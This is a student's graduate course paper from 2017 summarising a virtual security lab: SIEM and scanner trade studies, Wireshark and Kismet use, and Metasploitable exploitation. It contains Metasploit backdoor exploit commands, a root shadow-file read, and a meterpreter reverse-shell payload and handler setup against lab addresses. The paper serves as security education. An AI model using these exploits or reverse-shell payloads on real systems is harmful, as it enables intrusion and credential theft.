Running head: FINAL COMPREHENSIVE OVERVIEW OF THE VIRTUALIZED 1

Final comprehensive overview of the virtualized security platform

Raul Mendoza

University of San Diego

Network Visualization and Vulnerability Detection

CSOL 570

Mike Hallman

March 12, 2017

FINAL COMPREHENSIVE OVERVIEW OF THE VIRTUALIZED 2

Final comprehensive overview of the virtualized security platform

Trade Study Review

Trade-study on open source network visualization tools:

In this study, I reviewed and evaluated two open source network visualization/ Security

information and event management (SIEM) tools (AlienVault OSSIM, SIEMonster) based on

five criteria using information gathered from publicly available sources.

The exchange of information and visualization provided expands an analyst’s ability to

quickly identify attacks and incidents without the necessity to manually correlate the

information. Many of these tools interact with other SIEM systems in order to present a complete

picture. Based on the established evaluation criteria I set for this study, I created essential areas

of focus to ensure the analyst was provided visual and correlation tools. Although cost was not

included, if considered, could present considerable shift in selection of a SIEM tool.

When reviewing and grading the capabilities provided in each tool, an analyst’s ability to

receive correlated information, have the information displayed in a clear manner, and maintain

situational awareness of their environment in real-time became clear. SIEMonster provided

greater depth of monitoring capabilities, data correlation, documentation, and reporting

mechanisms which made it the distinct winner.

Wireshark Capture:

The purpose of this trade-study was to install and perform a Wireshark capture of

selected traffic. In order to perform the capture correctly, we had to identify the necessary

interface the traffic would be transmitting through. Once selected, the traffic began to flow

through Wireshark and I was able to review specific protocols based on specific types of
3

filtering. The filtering applied allowed me to review IP packets captured, TCP segments captured

on port 80 (tcp.port == 80), and encrypted messages captured TLSv1.2.

Wireshark provides administrators the ability to monitor traffic within a specific network.

As an open source tool, it has opened the door for multiple security experts to analyze packets

without having to spend a large sum of money. This tool enables Network administrators the

ability to troubleshoot network problems, security engineers to identify security problems,

developers to debug protocol implementations, and provide users an effective way to learn about

protocols. Wireshark is extremely powerful and should be included in any security experts tool

bag.

Vulnerability scanning trade-study:

In this trade-study we were expected to review two vulnerability tools (Nessus and

Nmap) to determine the optimal vulnerability tool for use based on the five evaluation criteria I

created. Vulnerability tools provide security experts the ability to map out and scan for

weaknesses found, as well as, have solutions offered to plug the holes.

The evaluation criteria aided in narrowing the focus of the trade study and ensured each

tool was reviewed fairly. Here are the criteria used:

1. What is the level of expertise/complexity required to operate the tool?

2. Is the tool compatible with the CVE program?

3. How frequently is the tool updated?

4. What level of support/documentation provided?

5. What is the cost of the tool?

4

When reviewing and grading the capabilities provided in each tool, it was easy to

determine which provided the most capabilities based on the criteria. Although Nessus appeared

to score well across the criteria, it is important to acknowledge the cost that supports its ability to

provide the level of support, functionality, and integration others lack because they are not

funded similarly. Nmap does provide a robust number of options and if cost is the most

important factor, then should meet/exceed expectations. But in addition to cost, when

considering all factors, Nessus was the clear choice.

Metasploitable image and exploits:

There are many ways we can use tools to determine the landscape of existing

vulnerabilities within an environment. Within a system or network there are methods to identify

the type of operating system and hardware that exists. In this trade study we were expected to

determine the landscape of the environment/target VM and perform exploits based on discovered

vulnerabilities.

During the enumeration phase of this study I ran numerous Nmap scans against the

Metasploitable image.

Scan: nmap -p0-65535 192.168.56.101

Scan: nmap -sT 192.168.56.101 - Scan using TCP connect

Scan: nmap -sS 192.168.56.101- Scan using TCP SYN scan

Scan: nmap -sU -p 123,161,162 192.168.1.1- Scan UDP ports

Scan: nmap -A 192.168.56.101- Detect OS and Services

Once the enumeration was complete, I determine which exploit(s) to use to achieve

successful access of the system. Upon review of the target system we are able determine the
5

operating system and services currently running. Below are the different exploits used to gain

access:

FTP allows for anonymous log in and is vulnerable to the vsftpd-backdoor exploit.

Successfully, achieved root access and was able to retrieve the show file for root.

• “use exploit/unix/ftp/vsftpd_234_backdoor”

• Exploit

• whoami

• hostname

• grep root /etc/shadow

HTTP port 80 is open and is hosting an Apache 2.2.8 webserver

Telnet sends text in the clear and allows anyone monitoring traffic to see usernames and

passwords as they are passed across the network.

Metasploitable2 runs the UnreaIRCD IRC daemon and I was able to gain access.

• use exploit/unix/irc/unreal_ircd_3281_backdoor

• set RHOST 192.168.56.101

• Exploit

When determining how best to exploit a system, it is important to know the landscape

and potential vulnerabilities associated with the target environment. Once enumeration was

complete, I determined which exploits to use. Throughout this study, I was able to effectively

enumerate the target system and successfully run different exploits to achieve access as root.

Though I was successful in achieving access, not every service was vulnerable. Although not

every service was exploitable, an attacker only needs one to achieve the same results.

Kismet review and operation:

6

For this trade study we were asked to install Guest additions and an external USB adapter

within our Kali environment. Installation of the Guest additions are designed to be installed

inside a virtual machine after the guest operating system has been installed. They consist of

device drivers and system applications that optimize the guest operating system for better

performance and usability. Because the VM does not see the built-in wireless adapter, an

external USB adapter was necessary to achieve the optimal results for wireless collection.

In order to effectively run Kismet, we needed to start the server first. When configuring

the server, an interface must be added (wlan0) to capture the appropriate wireless traffic. Once

the server was started, the client was launched. Upon successful configuration, the wireless

adapter began identifying SSIDs and clients. In addition, we were asked to log the necessary

information. When creating different log files, I specified the type of data I wanted kismet to log

by using the following command:

o logtypes=dump,network,csv,xml,weak,cisco,gps

Here we have told kismet to create log files for:

•Kismet-Mar-05-2008-1.cisco

•Kismet-Mar-05-2008-1.csv

•Kismet-Mar-05-2008-1.dump

•Kismet-Mar-05-2008-1.network

•Kismet-Mar-05-2008-1.weak

•Kismet-Mar-05-2008-1.xml

When configuring and running kismet I was able to detect, identify, capture, and log

wireless traffic, access points, and clients. It is powerful because of its ability to passively collect

information without sending any logging packets or information. In addition, because of its
7

ability to channel hop, I was also able see a large amount of SSIDs regardless of adjacent

channel overlap. Kismet is a useful tool that provides us the visibility and knowledge of what

wireless activity is occurring and determine whether clients are connected to a network. Because

I created separate logs, I was able to view the following information:

• Layer 2 protocols for Cisco devices

• Raw packet dump for wireshark

• Network information

• Identify packets with weak initialization vectors for WEP

Virtualized test lab architecture

Kali VM

The kali environment provides us a suite of tools to perform a number of actions that

allow for various collection, enumeration, and exploits of hosts and networks. For the purpose of

this course we were asked to load and use kali to gain knowledge of the tools and environment.

My environment possesses the following configuration:

O/S: Debian 64 bit

Memory Size: 2048

Hard Drive: 8GB

DHCP IP address: 192.168.56.102

IP Range: 192.168.56.101-254

Network: 570 test lab

Metasploitable VM
8

Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux

designed for testing security tools and demonstrating common vulnerabilities. In this study we

were asked to install/launch the VM and use kali to perform numerous operations against it.

Below is the environment built for these actions:

O/S: Ubuntu 64 bit

Memory Size: 1024

Hard Drive: 8GB

DHCP IP address: 192.168.56.110

IP Range: 192.168.56.101-254

Network: 570 test lab

OSSIM

OSSIM, AlienVault’s Open Source Security Information and Event Management (SIEM)

product, provided open source SIEM complete with event collection, normalization, and

correlation. The configuration required more resources due to the level of operations performed:

O/S: Linux 64 bit

Memory Size: 2048

Processors: 2

Hard Drive: 16GB

DHCP IP address: 192.168.56.115

IP Range: 192.168.56.101-254

Network: 570 test lab

Kali VM with Guest additions

9

Kali VM was the standard load, but Guest additions was installed to increase user

operability and device management. The configuration was the same with the exception of the

USB adapter:

O/S: Debian 64 bit

Memory Size: 2048

Hard Drive: 8GB

DHCP wlan0 IP address: 192.168.56.103 (when working)

IP Range: 192.168.56.101-254

Network: 570 test lab

Security Toolkit

Tool Type Tool Name Tool Description

Security Event Information AlienVault OSSIM AlienVault OSSIM is an open

source SIEM that provided

Management tool
correlation to various events across

multiple levels throughout my

environment. In addition, provided

Asset discovery, Vulnerability

assessment, Intrusion detection,

Behavioral monitoring.

Security Event Information SIEMonster SIEMonster is an open source SIEM

that provided Web services

Management tool
monitoring, Firewall capabilities,

Domain monitoring, OSINT, HIDS,

IPS, and AV. In addition, correlated

10

all the information and visually

presented it to me with ease.

Network scanning tool Nessus Enterprise scanning tool that

performs enumeration and detection

of available services running within

a host or network.

Network scanning tool Nmap Open source scanning to within Kali

that allows for enumeration and

detection of available services

running within a host or network.

Packet capture tool Wireshark An open source packet capture tool

that provided me the ability to

perform traffic analysis, integrated

sorting, and filtering options within

my virtual environment.

Wireless Packet Capture tool Kismet Wireless packet capturing tool

designed to detect, identify, capture,

and log wireless traffic, access

points, and clients. In addition,

provided me the ability to log

various data points for the different

SSIDs.

Exploitation tool Metasploit A framework and collection of

programs and tools for penetration

testing networks. Metasploit has a

collection of exploits, payloads,

libraries, and interfaces that can be

used to exploit computers.

11

Surveillance and Reconnaissance Processes

1. Scan a network to determine the operating systems installed on hosts

a. Nmap:

i. Scan: nmap -A 192.168.56.101- Detect OS and Services

b. Nesus:

i. GUI based uses a combination of remote probes (e.g., TCP/IP,

SMB, HTTP, NTP, SNMP, etc.), it is possible to guess the name of

the remote operating system in use.

2. Perform a dictionary attack against a host’s SSH service

a. Metasploit

i. # rlogin -l root 192.168.56.110

3. Launch an exploit payload against a vulnerable web service

a. Metasploit

i. msfpayload php/meterpreter/reverse_tcp LHOST=192.168.56.102

LPORT=4444 R > payload.php

ii. Use multi/handler

iii. Set PAYLOAD php/meterpreter/reverse_tcp

iv. Set LHOST192.168.56.102

v. Set LPORT 4444

vi. Exploit -z -j
12

4. Identify the ports listening on a host

a. Nmap:

i. Scan: nmap -p0-65535 192.168.56.101

ii. Scan: nmap -sT 192.168.56.101 - Scan using TCP connect

iii. Scan: nmap -sS 192.168.56.101- Scan using TCP SYN scan

iv. Scan: nmap -sU -p 123,161,162 192.168.1.1- Scan UDP ports

b. Nesus:

i. GUI/plugin based, uses two different types of scans, basic and

advanced to run netstat port scanner for a list of open ports and

then flags any open ports that deviate from the pre-defined policy.

5. Eavesdrop on communications between two hosts

a. Wireshark:

i. Scroll to “09 Sniffing and Spoofing”

ii. Select Wireshark

iii. Wireshark will start at which point you will need to select an

interface to begin packet capture.

iv. Select eth0

v. Once started, Wireshark will begin collecting traffic specific to

Eth0

vi. If we want to see specific traffic, we can apply different filters that

will show only what we want to see. In this instance, I applied a

TCP filter showing only Web traffic captured on port 80 (tcp.port

== 80)
13

6. Identify the SSID of an active wireless network

a. Kismet:

i. Upon starting the Kismet server the interface was added

ii. Wlan0 began searching for traffic

iii. Select the Network list

iv. Another window will display all the detected SSIDs broadcasting